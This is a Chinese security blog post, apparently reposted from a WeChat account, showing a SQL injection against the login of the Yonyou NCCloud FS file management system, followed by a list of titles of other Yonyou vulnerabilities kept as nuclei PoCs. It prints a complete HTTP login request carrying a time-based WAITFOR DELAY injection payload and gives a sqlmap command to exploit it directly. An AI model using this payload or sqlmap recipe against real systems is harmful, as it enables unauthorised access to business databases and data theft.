文章简介
网络测绘
演示过程
登录页面如下
登录请求包如下
GET /fs/console?username=222';WAITFOR%20DELAY%20'0:0:5%20--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1Host:Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: JSESSIONID=2CF7A25EE7F77A064A9DA55456B6994D.server; JSESSIONID=0F83D6A0F3D65B8CD4C26DFEE4FCBC3C.serverConnection: close
payload位时间注入判断,WAITFOR DELAY '0:0:5 等于sleep(5)发送数据包后页面等待5秒后访问
sqlmap抓取登录包可直接跑
sqlmap -r 1.txt
nuclei-pocs
用友漏洞待更新记录(已更新18)
-
用友 U8 OA test.jsp SQL注入漏洞
-
用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167)
-
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
-
用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
-
用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
-
用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
-
用友 NC NCFindWeb 任意文件读取漏洞
-
用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
-
用友 GRP-U8 UploadFileData 任意文件上传漏洞
-
用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
-
用友nc 控制台绕过漏洞
-
用友 NC 系统 uapws wsdl XXE(2022hw)
-
用友时空KSOA软件前台文件上传漏洞(2022hw)
-
用友nc v6.5 反射型xss
-
用友nc接口信息泄露漏洞
-
用友GRP-U8 财务管理软件servlet
-
用友 NCCloud FS文件管理SQL注入
-
用友nc v6.5 反序列化漏洞 补丁绕过
-
用友nc v6.5 反序列化漏洞
-
(CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞
-
用友nc IUFO v5
原文始发于微信公众号(北极星sec):用友 NCCloud FS文件管理SQL注入 nuclei
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论